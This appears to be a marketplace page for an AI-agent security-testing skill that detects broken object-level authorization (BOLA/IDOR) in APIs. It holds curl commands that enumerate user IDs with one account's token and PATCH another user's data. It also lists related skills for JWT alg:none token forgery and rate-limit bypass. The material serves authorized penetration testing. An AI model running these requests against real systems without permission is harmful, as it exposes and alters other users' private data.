在 Manus 中运行任何 Skill
一键导入
一键导入
一键在 Manus 中运行任何 Skill
开始使用bola
星标2
分支0
更新时间2026年6月3日 04:04
检测 API 中的对象级授权缺陷(BOLA/IDOR),通过篡改对象标识符越权访问或修改其他用户的数据。
安装
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
SKILL.md
readonly菜单
检测 API 中的对象级授权缺陷(BOLA/IDOR),通过篡改对象标识符越权访问或修改其他用户的数据。
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
| name | bola |
| description | 检测 API 中的对象级授权缺陷(BOLA/IDOR),通过篡改对象标识符越权访问或修改其他用户的数据。 |
| category | api |
| source | xalgorix |
| tags | ["BOLA","API 安全","授权缺陷","OWASP API1:2023"] |
| required_tools | ["curl"] |
# 列出所有包含对象引用的端点
# GET /api/users/123
# GET /api/orders/456/items
# POST /api/documents/789/download
# 用账号 A 获取自己的资源
curl -s "https://<target>/api/users/<user_a_id>/profile" \
-H "Authorization: Bearer <token_a>" | tee baseline.json
# 用账号 A 的 Token 访问其他用户 ID
for id in $(seq 1 20); do
code=$(curl -s -o /dev/null -w "%{http_code}" \
"https://<target>/api/users/$id/profile" \
-H "Authorization: Bearer <token_a>")
[ "$code" = "200" ] && echo "BOLA possible: user $id"
done
# UUID 场景 — 用账号 B 的 UUID 替换
curl -s "https://<target>/api/users/<user_b_uuid>/profile" \
-H "Authorization: Bearer <token_a>"
# Slug 场景
curl -s "https://<target>/api/users/<user_b_username>/profile" \
-H "Authorization: Bearer <token_a>"
# PATCH 修改其他用户数据
curl -X PATCH "https://<target>/api/users/<user_b_id>" \
-H "Authorization: Bearer <token_a>" \
-H "Content-Type: application/json" \
-d '{"note": "BOLA test - please ignore"}'
通过被动来源和受控主动 DNS 枚举目标子域名,发现更多授权攻击面入口。
使用 agent-browser 在授权范围内执行浏览器交互验证,并在需要视觉判断时调用 pents vision-review 生成结构化视觉复核结果。
检测 API 中的功能级授权破坏(BFLA),验证普通用户是否能通过直接调用管理端点或操纵 HTTP 方法来执行管理员功能。
利用 JWT 库接受 alg:none 的漏洞绕过签名验证,伪造任意 Token 实现权限提升。
检测 API 中的批量赋值漏洞,通过在请求体中添加非预期字段修改不应被客户端控制的属性。
检测和绕过 API 速率限制,通过 HTTP 头操纵、路径变体和参数污染绕过节流控制。